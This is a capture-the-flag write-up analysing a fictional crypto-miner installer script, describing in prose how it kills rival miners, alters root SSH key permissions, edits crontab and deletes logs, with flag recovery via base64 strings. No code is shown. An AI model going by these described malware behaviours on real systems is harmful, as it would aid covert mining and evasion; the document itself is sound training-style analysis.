CHALLENGE DESCRIPTION
In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor's miner's installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.
Solution Summary
Script analyses
Extract base 64 strings
Reconstruct flag
References
N/A
1) Script analyses
Script Analyses Summary
The script appears to be looking for IOC's related to crypto mining and attempts to remediate them. We see for example that the script checks for services, log files, and network connections related to crypto mining and then attempts to stop the processes, delete the logfiles, and close network connections.
We start by reviewing the provided challenge file "miner_installer.sh"
Initially when I saw the file name and skimmed through the file I felt like this might be related to a IAC (infrastructure as code) platform such as ansible, puppet, terraform and so on. But I quickly realized this script was actually enumerating the system for IOC's related to crypto mining in attempts to remediate these related IOC's.
The function "clean environment" caught my attention as it was removing files and changing permissions. This includes sensitive folders like the root users ssh key.
The following part of the script is now looking for specifics within the crontab.
In this area, we see the script is checking for processes related to crypto mining.
We continue to see the script is attempting to check processes related to crypto mining and kill the processes.
From here we see attempts to clean up log files related to crypto mining services which were identified by googling the IOC's found below.
Comments